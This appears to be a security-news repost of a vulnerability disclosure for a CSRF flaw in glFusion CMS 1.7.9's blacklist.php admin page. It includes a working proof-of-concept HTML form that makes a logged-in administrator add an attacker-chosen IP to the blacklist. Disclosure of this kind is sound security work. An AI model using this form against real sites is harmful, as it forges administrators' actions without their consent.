Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-44948: glFusion CMS 1.7.9 blacklist.php CSRF vulnerability · Issue #486 · glFusion/glfusion

glFusion CMS 1.7.9 is affected by a Cross Site Request Forgery (CSRF) vulnerability in /public_html/admin/plugins/bad_behavior2/blacklist.php. Using the CSRF vulnerability to trick the administrator to click, an attacker can add a blacklist.

CVE
#csrf#vulnerability

Attackers can construct blacklist IP addresses. Using the CSRF vulnerability to trick the administrator to click, can add a blacklist

  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.255.130/glfusion-1.7.9/public_html/admin/plugins/bad_behavior2/blacklist.php" method="POST">
      <input type="hidden" name="mode" value="addsave" />
      <input type="hidden" name="bl&#95;type" value="spambot&#95;ip" />
      <input type="hidden" name="bl&#95;item" value="1&#46;1&#46;1&#46;121" />
      <input type="hidden" name="ban&#95;reason" value="ipbrute" />
      <input type="hidden" name="submit" value="Submit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907